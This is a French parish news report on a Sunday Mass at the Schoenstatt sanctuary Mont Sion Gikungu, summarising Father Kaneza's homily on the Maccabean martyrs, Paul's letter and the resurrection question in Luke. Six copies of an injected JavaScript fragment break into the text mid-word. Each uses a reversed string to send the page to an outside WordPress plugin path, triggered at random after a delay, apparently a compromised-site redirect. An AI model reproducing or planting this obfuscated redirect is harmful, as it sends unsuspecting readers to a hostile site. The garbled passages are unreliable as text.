Le deuxième livre des Martyrs d’Israël (2 M 7, 1-2.9-14), la deuxième lettre de saint Paul apôtre aux Thessaloniciens (2 Th 2, 16 – 3, 5) et l’Évangile de Jésus Christ selon saint Luc (Lc 20, 27-38), telles sont les saintes Écritures qui constituaient la sainte Messe de 10 heures de ce trente-deuxième Dimanche du Temps Ordinaire présidée par le Vice-Recteur du Sanctuaire marial de Schoenstatt Mont Sion Gikungu, Père Floribert KANEZA et animée en chants liturgiques par la chorale saint Martin.

Après avoir accueilli et salué l’Assemblée de Dieu, le célébrant a résumé les lectures du jour à commencer par la première lecture qui parlait de sept frères qui ont accepté de mourir que de faillir à leur foi, la deuxième qui invite les Thessaloniciens à prier sans cesse les uns pour les autres et enfin l’Évangile selon lequel Jésus montre aux sadducéens la différence entre la vie terrestre et vie céleste. Et de poursuivre que nous sommes vers la fin de l’année liturgique C, que ses saintes Écritures qui nous parlent de la vie d’après celle-ci nous poussent à prendre du temps pour réfléchir à notre fin et à voir si réellement nous irons au Ciel. Il a aussi mentionné la branche des Académiciennes du Mouvement de Schoenstatt (Famille de Calices) venue remercier le Seigneur pour toutes les grâces obtenues et en même temps pour les unes recevoir le sanctuaire toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domestique, prendre le foulard du Mouvement et pour les autres conclure l’Alliance d’amour avec la Vierge Marie. Signalons que ceci se passe après un camp de formation de 3 jours.

Dans son homélie, le vice-Recteur est revenu sur la première lecture de ces sept frères qui n’ont pas craint la mort et ont cru en la résurrection promise par le Seigneur. Le roi Antiocos voulait qu’ils vivent comme les Grecs, qu’ils abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent leurs culture et croyance au profit de celles imposées par les Grecs. Les frères lui ont refusé catégoriquement et cette impossibilité de se laisser toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominer leur a coûté la vie. Quelle leçon ceci nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne?, s’est interrogé Père KANEZA. Nous sommes aussi appelés à vivre notre foi, à la manifester et même mourir pour elle comme le cas de ses frères. Que la torture ne nous pousse à lâcher, à céder, soyons braves. Par contre, dans de telles conditions, exprimons notre foi, ce à quoi nous croyons. Et de rappeler aux fidèles de craindre plutôt Dieu parce que Lui, son châtiment va au-delà de la mort physique que les hommes peuvent les faire subir.

Quant à la deuxième lecture, le célébrant l’a divisé en trois parties. Premièrement, c’est l’apôtre Paul qui prie pour les Thessaloniciens afin que Dieu les réconforte et les affermisse dans leur marche pour qu’ils ne s’en détournent point. Deuxièmement, c’est lui qui leur demande de prier pour lui et pour sa mission. Troisièmement, il leur prodigue des conseils sur l’utilité de la prière et d’être en communion avec le Christ.  

Concernant l’Évangile du jour, le prédicateur montre comment Jésus répond à ceux qui lui tendent un piège concernant la question de la résurrection avec cet exemple de sept frères qui sont tous morts sans laisser d’enfants. Ils sont partis de cette phrase : « Maître, Moïse nous a prescrit …. » Pourquoi citent-ils le nom de Moïse ? C’est parce que, selon les sadducéens, dans les cinq premiers livres de la Bible (Pentateuque) nulle part où est affirmé la résurrection, que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc qu’il n’existe, ni ange ni esprit tandis que les pharisiens affirment les deux choses. La réponse de Jésus est claire à ce sujet : « Les enfants de ce monde prennent femme et mari. Mais ceux qui ont été jugés dignes d’avoir part au monde à venir et à la résurrection d’entre les morts ne prennent ni femme ni mari, car ils ne peuvent plus mourir : ils sont semblables aux anges, ils sont enfants de Dieu et enfants de la résurrection. » Le Père KANEZA a expliqué que la vie céleste est très différente de la vie terrestre, il n’y a pas de continuité. Que chacun prenne la décision de mener une vie de sainteté sur terre, d’entraide, d’accomplir de bonnes œuvres afin qu’au dernier jour, il puisse avoir d’innombrables actions à présenter qui le justifieront. Signalons qu’à la fin de la messe, la branche des Académiciennes a effectué une procession vers le Sanctuaire où dix d’entre elles ont reçu le sanctuaire toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domestique, treize ont scellé l’Alliance d’Amour avec la Vierge Marie et huit autres la prise des foulards.

Germain Nahimana